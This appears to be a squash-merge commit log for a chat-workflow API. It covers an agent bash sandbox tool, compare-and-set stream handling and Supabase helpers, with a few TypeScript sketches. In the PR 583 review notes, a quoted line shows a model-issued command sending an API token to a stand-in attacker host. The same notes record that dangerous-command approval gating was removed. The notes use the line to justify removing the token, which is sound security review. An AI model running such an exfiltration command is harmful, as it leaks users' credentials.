- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.
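
One way to picture the generic `where` predicate is a pure function that sorts each entry into `column = value` or `column IS NULL`. This is a sketch under assumptions: `splitWhereSketch` and its return shape are hypothetical, and it does not call Supabase.

```typescript
type WhereValue = string | number | boolean | null | undefined;

// Hypothetical helper: partition a where map into equality matches and
// columns that must be NULL. Undefined entries are skipped (assumption).
function splitWhereSketch(where: Record<string, WhereValue>): {
  equals: Record<string, string | number | boolean>;
  nullColumns: string[];
} {
  const equals: Record<string, string | number | boolean> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === undefined) continue;
    if (value === null) {
      nullColumns.push(column); // maps to `column IS NULL`
    } else {
      equals[column] = value; // maps to `column = value`
    }
  }
  return { equals, nullColumns };
}
```

A compare-and-set that expects an empty slot would then pass `{ id: chatId, active_stream_id: null }`, with no column name hardcoded in the generic layer.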

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).
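
The in-operator narrowing from item 1 looks roughly like this. The union mirrors the `{ok, claimed} | {ok: false, error}` shape quoted in the earlier commit; the `string` error type and the function name are assumptions.

```typescript
type CasResult =
  | { ok: true; claimed: boolean }
  | { ok: false; error: string };

// Hypothetical consumer: narrows on property presence instead of on `ok`.
function describeCasResult(result: CasResult): string {
  if ("error" in result) {
    // Only the failure member declares `error`, so `result` is narrowed here.
    return `db-error: ${result.error}`;
  }
  // Remaining member: { ok: true; claimed: boolean }.
  return result.claimed ? "claimed" : "race-lost";
}
```

Narrowing by property presence does not depend on `ok` being inferred as a literal `true` or `false`.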

Both fixes are behavior-neutral: the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.
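
The status codes above can be read as an ordered chain of checks. The sketch below assumes that auth and body validation (401 / 400) have already passed; the row shapes, field names, and the exact ordering of the 403 and 404 checks are hypothetical, not taken from the handler.

```typescript
interface SessionRowSketch {
  id: string;
  accountId: string;
  sandboxActive: boolean;
}

interface ChatRowSketch {
  id: string;
  sessionId: string;
}

interface LookupSketch {
  accountId: string; // account behind the API key
  sessions: SessionRowSketch[] | null; // null models a DB error
  chat: ChatRowSketch | null;
}

// Hypothetical mapping from lookup results to the documented status codes.
function resolveStatusSketch(lookup: LookupSketch, sessionId: string): number {
  if (lookup.sessions === null) return 500; // session query failed
  const session = lookup.sessions.find((row) => row.id === sessionId);
  if (!session) return 404; // session not found
  if (session.accountId !== lookup.accountId) return 403; // not the owner
  if (!lookup.chat || lookup.chat.sessionId !== session.id) return 404; // chat missing or under another session
  if (!session.sandboxActive) return 400; // "Sandbox not initialized"
  return 200;
}
```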

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`, proving
that the tool-execution machinery works end-to-end. The remaining 10
files (the read, write, grep, glob, todo, task, ask_user_question,
skill, and fetch tools, plus utils) port in a follow-up; this PR's scope
was deliberately held to one tool so the wire-up is reviewable in
isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.
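
The tightened guard from the P2 item can be sketched as below. The interface is an assumption that covers only the two fields named above (`sandbox.state` and `sandbox.workingDirectory`); the real AgentContext may carry more.

```typescript
// Hypothetical shape covering only the fields the commit message mentions.
interface AgentContextSketch {
  sandbox: { state: object; workingDirectory: string };
}

function isAgentContextSketch(value: unknown): value is AgentContextSketch {
  if (typeof value !== "object" || value === null) return false;
  const sandbox = (value as { sandbox?: unknown }).sandbox;
  if (typeof sandbox !== "object" || sandbox === null) return false;
  const { state, workingDirectory } = sandbox as {
    state?: unknown;
    workingDirectory?: unknown;
  };
  // Reject `{ sandbox: {} }`: both fields must be present and usable.
  return (
    typeof state === "object" &&
    state !== null &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```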

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583, this restores the streamText stop condition
so the workflow agent gets the model wrap-up turn after a tool call
(model → tool → tool-result → model → text response) instead of stopping
at streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.
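
Why a one-step cap drops the wrap-up turn can be shown with a toy loop. This is not the AI SDK: `runStepsSketch` and the scripted steps are hypothetical and only model the step count.

```typescript
type StepSketch = { kind: "tool-call" } | { kind: "text"; text: string };

// Toy loop: replay scripted model steps until one produces text or the
// step cap is reached, whichever comes first.
function runStepsSketch(script: StepSketch[], maxSteps: number): StepSketch[] {
  const executed: StepSketch[] = [];
  for (const step of script) {
    if (executed.length >= maxSteps) break; // cap reached
    executed.push(step);
    if (step.kind === "text") break; // model finished with a text response
  }
  return executed;
}
```

With a cap of 1, a script of tool call then text stops after the tool call; with a high cap the text turn runs and the loop ends on its own.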

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
…tch (#585) (#586)

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).
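
A minimal sketch of both fixes, kept free of Supabase so it runs on its own. The `CasResult` field names follow the result shape described in the previous commit; `describeResult` and `splitWhere` are hypothetical names, not the repo's code.

```typescript
// Result union shaped like `{ok, claimed} | {ok: false, error}`.
type CasResult =
  | { ok: true; claimed: boolean }
  | { ok: false; error: string };

// `in`-operator narrowing: only the failure member has an `error` property,
// so this check discriminates the union without relying on the `ok` literal.
function describeResult(result: CasResult): string {
  if ("error" in result) {
    return `error: ${result.error}`;
  }
  return result.claimed ? "claimed" : "race lost";
}

// Splits a where-map into equality matches (suitable for one `.match(obj)`
// call) and columns that must be NULL (suitable for `.is(col, null)` calls).
function splitWhere(where: Record<string, string | null>): {
  equals: Record<string, string>;
  nullColumns: string[];
} {
  const equals: Record<string, string> = {};
  const nullColumns: string[] = [];
  for (const [column, value] of Object.entries(where)) {
    if (value === null) {
      nullColumns.push(column);
    } else {
      equals[column] = value;
    }
  }
  return { equals, nullColumns };
}
```

Splitting up front means the query builder is touched a fixed number of times instead of being reassigned inside a loop.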

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.
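
The tightened guard from the P2 item could look roughly like this. The `AgentContext` shape below is an assumption inferred from the review note (the real type may carry more fields), and `isRecord` is a hypothetical helper.

```typescript
// Assumed shape; only the fields named in the review note are modeled.
interface AgentContext {
  sandbox: {
    state: object;
    workingDirectory: string;
  };
}

function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

// Rejects `{ sandbox: {} }` and similar partial values so tools fail fast
// at the boundary instead of crashing later on undefined fields.
function isAgentContext(value: unknown): value is AgentContext {
  if (!isRecord(value)) return false;
  const sandbox = value["sandbox"];
  if (!isRecord(sandbox)) return false;
  const state = sandbox["state"];
  const workingDirectory = sandbox["workingDirectory"];
  return (
    isRecord(state) &&
    typeof workingDirectory === "string" &&
    workingDirectory.length > 0
  );
}
```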

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.
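
To illustrate why the cap matters, here is a toy model of a multi-step loop. It is not the AI SDK: `nextStep` and `runSteps` are hypothetical stand-ins that only mimic the model → tool → model sequence described above.

```typescript
// Toy step types; a real step carries far more data.
type Step =
  | { kind: "tool-call"; tool: string }
  | { kind: "text"; text: string };

// Scripted "model": first asks for a tool, then answers once it has a result.
function nextStep(history: Step[]): Step {
  return history.length === 0
    ? { kind: "tool-call", tool: "bash" }
    : { kind: "text", text: "done" };
}

// Runs steps until the model produces text or the step cap is reached.
function runSteps(maxSteps: number): Step[] {
  const history: Step[] = [];
  while (history.length < maxSteps) {
    const step = nextStep(history);
    history.push(step);
    if (step.kind === "text") break;
  }
  return history;
}
```

With a cap of 1 the run ends on the tool call and the user never sees a text reply; with a high cap such as 111 the same script finishes after two steps.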

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
